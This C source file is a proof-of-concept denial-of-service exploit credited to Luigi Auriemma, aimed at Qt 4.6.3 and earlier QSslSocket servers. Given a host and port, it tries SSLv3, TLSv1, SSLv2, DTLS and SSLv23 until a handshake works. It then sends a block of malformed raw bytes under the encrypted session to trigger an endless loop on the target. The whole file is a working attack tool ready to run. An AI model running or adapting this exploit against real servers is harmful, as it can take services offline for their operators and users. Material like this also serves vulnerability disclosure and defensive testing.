/*
  by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <openssl/ssl.h>    // link with libssl.a libcrypto.a -lgdi32

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      1024

#define SSL_CLOSE   SSL_shutdown(ssl_sd); \
                    SSL_free(ssl_sd); \
                    SSL_CTX_free(ctx_sd); \
                    close(sd);
#define SSL_COMP(X) SSL_CTX_set_cipher_list(X, "ALL"); \
                    SSL_CTX_set_options(X, SSL_OP_ALL);



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz);
int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz);
int putcc(u8 *data, int chr, int size);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    static struct   linger  ling = {1,1};
    const SSL_METHOD  *method;
    SSL_CTX *ctx_sd = NULL;
    SSL     *ssl_sd = NULL;
    struct  sockaddr_in peer;
    int     sd,
            try;
    u16     port;
    u8      *buff,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    fputs("\n"
        "Qt <= 4.6.3 QSslSocket endless loop "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stderr);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <host> <port>\n"
            "\n", argv[0]);
        exit(1);
    }
    host = argv[1];
    port = atoi(argv[2]);

    SSL_library_init();
    //SSL_load_error_strings();

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(0xffff);
    if(!buff) std_err();

    for(try = 0;; try++) {
        switch(try) {
            case 0: method = SSLv3_method();    break;
            case 1: method = TLSv1_method();    break;
            case 2: method = SSLv2_method();    break;
            case 3: method = DTLSv1_method();   break;
            case 4: method = SSLv23_method();   break;
            default: {
                printf("\nError: unsupported SSL method or not a SSL connection\n");
                exit(1);
                break;
            }
        }
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
        if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
          < 0) std_err();

        ctx_sd = SSL_CTX_new(method);
        SSL_COMP(ctx_sd)
        ssl_sd = SSL_new(ctx_sd);
        SSL_set_fd(ssl_sd, sd);

        // mysend is necessary to guess if the ssl version is wrong
        if((SSL_connect(ssl_sd) < 0) || (mysend(ssl_sd, sd, "", 0) != 0)) {
            SSL_CLOSE
            printf("- try another SSL version\n");
        } else {
            break;
        }
    }

    printf("- send malformed data\n");
    p = buff;
    p += putcc(p, 1, BUFFSZ);
    send(sd, buff, p - buff, 0);    // only the first (lame) way I found

    // no need to wait, it's linger
    SSL_CLOSE
    printf("\n- done, check the server manually\n");
    return(0);
}



int mysend(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_write(ssl_sd, data, datasz));
    return(send(sd, data, datasz, 0));
}



int myrecv(SSL *ssl_sd, int sd, u8 *data, int datasz) {
    if(ssl_sd) return(SSL_read(ssl_sd, data, datasz));
    return(recv(sd, data, datasz, 0));
}



int putcc(u8 *data, int chr, int size) {
    memset(data, chr, size);
    return(size);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            fprintf(stderr, "\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


